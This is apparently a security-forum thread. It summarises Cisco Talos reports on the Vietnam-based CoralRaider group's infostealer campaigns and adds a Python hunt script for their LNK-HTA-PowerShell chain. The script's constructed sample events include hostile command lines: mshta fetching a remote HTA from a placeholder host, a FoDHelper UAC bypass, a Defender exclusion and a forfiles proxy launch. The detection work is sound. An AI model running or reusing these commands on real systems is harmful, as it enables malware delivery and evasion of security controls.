"CoralRaider" is of Vietnamese origin and financial motivation

Father

Professional
Messages
1,983
Reputation
4
Reaction score
527
Points
113
Cisco Talos reports the discovery of a new financially motivated attacker, CoralRaider, which has been active since at least May 2023, targeting victims in India, China, South Korea, Bangladesh, Pakistan, Indonesia and Vietnam.

The group is engaged in the theft of credentials, financial data, and advertising and business accounts on social networks, using the malware RotBot and the XClient stealer.

Other payloads used by the group include a combination of remote access Trojans and information stealers: AsyncRAT, NetSupport RAT and Rhadamanthys.

The actor uses a dead drop technique, abusing a legitimate service to host the C2 configuration file, and uncommon LoLBins, including Windows Forfiles.exe and FoDHelper.exe.

The analysis showed that the attacker uses a Telegram bot as the C2 to exfiltrate data from victims' computers, which is then sold on the darknet and in specialized Telegram groups.

The attack chains begin with a Windows shortcut (LNK) file, although there is currently no clear explanation for how these files are distributed to targets.

If the LNK file is opened, an HTML application (HTA) file is downloaded and executed from an attacker-controlled download server, which in turn runs an embedded Visual Basic script.

The script decrypts and sequentially executes three further PowerShell scripts that perform checks, bypass Windows User Account Control (UAC), disable Windows and application notifications, and download and launch RotBot.

RotBot is a variant of the Quasar RAT client that the attacker configured and compiled for this campaign.

It is configured to communicate with the Telegram bot, deliver XClient and execute it in memory, ultimately stealing cookies, credentials and financial information from the Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox and Opera browsers, as well as Discord and Telegram data.

XClient is also capable of extracting detailed payment method information from victims' Facebook, Instagram, TikTok and YouTube accounts, including those associated with businesses and advertising accounts.

Based on Telegram analytics, language preferences, and IP sightings (in Hanoi), Cisco Talos researchers believe with a high degree of confidence that CoralRaider is based in Vietnam.

Additional technical details of the attack chain of the uncovered campaign can also be found in the QiAnXin Threat Intelligence Center report.
 

Father

According to a new report from Cisco Talos, the CoralRaider group uses CDNs to distribute malware in the United States, Great Britain, Germany, and Japan. The campaign is aimed at stealing credentials, financial information, and social media accounts.

CoralRaider uses the LummaC2, Rhadamanthys, and CryptBot infostealers, which are widely available on underground forums and distributed under the RaaS (Ransomware-as-a-Service) model. Based on an analysis of previous attacks, the experts attribute the campaign to CoralRaider with "moderate confidence".

Infection begins when the victim opens an archive containing a malicious LNK shortcut, which downloads and executes an encrypted HTA application from an attacker-controlled subdomain on the Bunny CDN platform. By using the CDN cache as the malware delivery server, the attacker avoids request delays and also bypasses network defenses.

Then, through a number of PowerShell scripts and auxiliary utilities such as FoDHelper.exe, the malware changes system settings to bypass User Account Control (UAC) and adds exclusions to Windows Defender.


CoralRaider Infection Chain

The malware versions used include new features such as:

interception of RDP session data and recovery of expired Google account cookies (LummaC2 and Rhadamanthys);

advanced obfuscation and anti-analysis mechanisms (LummaC2 and Rhadamanthys);

an expanded list of targeted applications, including password managers and authentication apps, which also puts cryptocurrency wallets protected by two-factor authentication at risk (CryptBot).


Apps targeted by the latest version of Cryptbot

According to the researchers, the CoralRaider group, presumably based in Vietnam, has been active since 2023 and previously used a Telegram bot to manage and exfiltrate data. While earlier attacks have more often focused on Asian and Southeast Asian countries, the latest operations cover a wider range of countries, including the United States, Nigeria, Pakistan, Ecuador, Egypt, the United Kingdom, Poland, the Philippines, Norway, Japan, Syria, and Turkey.
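Added example, written for this thread and not taken from either post or from the Talos reports: a small hunt over Sysmon-style process-creation and registry events for the delivery chain both posts describe (LNK double-click running mshta.exe against a remote HTA, the HTA spawning PowerShell, FoDHelper.exe abused to bypass UAC, a Defender exclusion added from the elevated context, and Forfiles.exe used as a proxy launcher). The sample events, PIDs, paths and the `cdn.example.invalid` host are constructed. Two details are assumptions of mine rather than facts stated in the posts: the `ms-settings\Shell\Open\command` registry value is the handler the publicly documented FoDHelper bypass writes (the posts only name the binary), and the Defender change is modelled as an `Add-MpPreference`/`Set-MpPreference` command line.

```python
"""Hunt over constructed Sysmon-style telemetry for the CoralRaider delivery
chain: LNK -> remote HTA (mshta.exe) -> PowerShell -> FoDHelper UAC bypass
-> Defender exclusion, plus forfiles.exe proxy execution.

Events are flat dicts: EID 1 (process create) carries pid/ppid/image/parent/cmd,
EID 13 (registry value set) carries pid/image/target. Sample data is constructed
for this example, not real telemetry."""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
HTA_HOSTS = {"mshta.exe"}

# Assumption: FoDHelper.exe auto-elevates and resolves the ms-settings protocol
# handler from the user hive; this key is the publicly documented hijack point.
MS_SETTINGS_KEY = re.compile(r"\\software\\classes\\ms-settings\\shell\\open\\command", re.I)
# Assumption: Defender tampering appears as Add-/Set-MpPreference on the command line.
DEFENDER_TAMPER = re.compile(r"\b(add|set)-mppreference\b.*-(exclusion\w*|disable\w+)", re.I)
# forfiles.exe /c runs an arbitrary command once per matched file (proxy execution).
FORFILES_PROXY = re.compile(r"\bforfiles(\.exe)?\b.*\s/c\s", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample, in arrival order
    {"id": 1, "pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "mshta.exe https://cdn.example.invalid/stage1.hta"},
    {"id": 1, "pid": 300, "ppid": 200, "image": PS, "parent": r"C:\Windows\System32\mshta.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -f C:\\Users\\Public\\s1.ps1"},
    {"id": 13, "pid": 300, "image": PS,
     "target": r"HKU\S-1-5-21-1\Software\Classes\ms-settings\Shell\Open\command\(Default)"},
    {"id": 1, "pid": 400, "ppid": 300, "image": r"C:\Windows\System32\fodhelper.exe",
     "parent": PS, "cmd": "fodhelper.exe"},
    {"id": 1, "pid": 500, "ppid": 400, "image": PS, "parent": r"C:\Windows\System32\fodhelper.exe",
     "cmd": "powershell.exe -c \"Add-MpPreference -ExclusionPath 'C:\\Users\\Public'\""},
    {"id": 1, "pid": 600, "ppid": 500, "image": r"C:\Windows\System32\forfiles.exe", "parent": PS,
     "cmd": 'forfiles /p C:\\Windows /m notepad.exe /c "cmd /c start C:\\Users\\Public\\rot.exe"'},
    # Benign noise: an admin reading Defender settings from a console.
    {"id": 1, "pid": 700, "ppid": 100, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe -c Get-MpPreference"},
]


def basename(path):
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Return (rule, pid) findings in event order. Stateful: a FoDHelper launch
    is only flagged when its parent previously wrote the ms-settings handler."""
    findings = []
    hijackers = set()  # pids that wrote the ms-settings handler value
    for ev in events:
        if ev["id"] == 13:
            if MS_SETTINGS_KEY.search(ev["target"]):
                hijackers.add(ev["pid"])
                findings.append(("ms_settings_handler_hijack", ev["pid"]))
            continue
        img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmd"]
        # Stage 1: LNK double-click (explorer.exe) running mshta against a URL.
        if img in HTA_HOSTS and parent == "explorer.exe" and REMOTE_URL.search(cmd):
            findings.append(("mshta_remote_hta_from_explorer", ev["pid"]))
        # Stage 2: the HTA's embedded script spawning a script host.
        if img in SCRIPT_HOSTS and parent in HTA_HOSTS:
            findings.append(("script_host_spawned_by_hta", ev["pid"]))
        # Stage 3: FoDHelper launched by the process that hijacked its handler.
        if img == "fodhelper.exe" and ev["ppid"] in hijackers:
            findings.append(("fodhelper_uac_bypass", ev["pid"]))
        # Stage 3b: whatever FoDHelper launches inherits high integrity.
        if img in SCRIPT_HOSTS and parent == "fodhelper.exe":
            findings.append(("elevated_child_of_fodhelper", ev["pid"]))
        # Stage 4: Defender exclusion / protection disabled from that context.
        if DEFENDER_TAMPER.search(cmd):
            findings.append(("defender_tamper", ev["pid"]))
        # LoLBin proxy execution via forfiles.exe /c.
        if img == "forfiles.exe" and FORFILES_PROXY.search(cmd):
            findings.append(("forfiles_proxy_exec", ev["pid"]))
    return findings


def stages_seen(findings):
    """Distinct rule names hit, for a quick 'how much of the chain fired' view."""
    return {rule for rule, _ in findings}


if __name__ == "__main__":
    for rule, pid in hunt(SAMPLE_EVENTS):
        print(f"{rule:32s} pid={pid}")
```

The registry write to the ms-settings handler followed by a fodhelper.exe launch from the same process is the high-fidelity pair here; mshta.exe with a URL under explorer.exe and a script host under fodhelper.exe are strong on their own, while the Defender and forfiles rules need allow-listing of admin tooling in a real environment. The benign Get-MpPreference event in the sample is there to show the tamper rule does not fire on read-only queries.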
 